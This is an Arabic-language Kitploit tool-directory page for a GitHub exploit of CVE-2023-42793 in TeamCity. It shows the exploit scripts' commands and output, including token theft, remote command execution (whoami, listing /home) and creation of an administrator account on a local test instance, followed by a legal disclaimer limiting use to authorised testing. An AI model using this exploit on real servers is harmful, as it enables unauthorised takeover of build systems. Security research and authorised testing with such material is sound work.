Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-42793 — TeamCity 2023.05.3 - CVE-2023-42793 - إنشاء اسم مستخدم المسؤول | Kitploit
أدوات/GitHubGitHub/cxdxnt/cve-2023-42793
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubcxdxnt/cve-2023-42793

CVE-2023-42793

TeamCity 2023.05.3 - CVE-2023-42793 - إنشاء اسم مستخدم المسؤول

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-42793 - إنشاء اسم مستخدم مسؤول

مثال على تنفيذ الأوامر:

root@kitploit:~
python3 exploit.py -u http://localhost
User add token ->  eyJ0eXAiOiAiVENWMiJ9.YkZ0V2tzR3NvWXhZelRfZTN0cFF1SkZjVWVz.N2M0Njk2ZTgtNWZhYi00MTU5LWJmZjQtYWU1MDFlYzZiMGY1
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser

StdErr: 
Exit code: 0
Time: 16ms
Command -> ls -la /home
StdOut:total 8
drwxr-xr-x 2 root root 4096 Apr 15  2020 .
drwxr-xr-x 1 root root 4096 Feb 28  2024 ..

StdErr: 
Exit code: 0
Time: 23ms

في حال انتهاء صلاحية التوكن، سيتم إنشاء توكن جديد تلقائياً.

root@kitploit:~
Command -> whoami
[-] Token expired, restarting...
[!]Error deleting user
User add token ->  eyJ0eXAiOiAiVENWMiJ9.ZVJiSTB6SGZWSEpldzhEa1o4cUdsWFlQRTJJ.NGQxOTg4ZWItNTJmYS00OWM3LWIwYmItZjcyODNkYjg5NTJj
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser

StdErr: 
Exit code: 0
Time: 24ms

إنشاء اسم مستخدم مسؤول:

root@kitploit:~
python3 user_add_administrator.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token ->  eyJ0eXAiOiAiVENWMiJ9.Z21xU3ZtTXNYUXE2WGdkaWJCOFV4QWsxN2s0.NmMyZDE0YTItMDQ1OS00NGQ2LTk2YWEtNjg1MTU3ZGNiNjM0
Create username administrator

في حال وجود مستخدم موجود مسبقاً:

root@kitploit:~
python3 user_add.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token ->  eyJ0eXAiOiAiVENWMiJ9.Q3ZFa0ExR2tBcGlSMUZ3ZWNyMUtNN0VPQmFN.Mzk0M2EyZjAtMzVhNi00YTU0LWFmNTctMTg4MThkZmU5MDA3
is already in use by some other user.

تحذير قانوني

هذا المستودع مخصص لأغراض تعليمية وبحثية في مجال أمن الحوسبة فقط. استخدام النصوص البرمجية والتقنيات الموصوفة هنا لاختراق الأنظمة دون إذن يعتبر غير قانوني وينتهك القوانين الوطنية والدولية، مثل القانون 26.388 (الأرجنتين)، وقانون الاحتيال وإساءة استخدام الحاسوب (الولايات المتحدة)، واتفاقية بودابست.

المؤلف غير مسؤول عن سوء استخدام المعلومات المقدمة هنا. يُسمح باستخدام هذه المواد فقط في بيئات خاضعة للرقابة، أو مختبرات، أو مسابقات CTF، أو بإذن صريح من مالك النظام.

إذا كنت ستجري اختبارات، فتأكد من حصولك على إذن. القرصنة دون إذن ليست اختراقاً أخلاقياً؛ بل هي جريمة.

تنزيل الأداة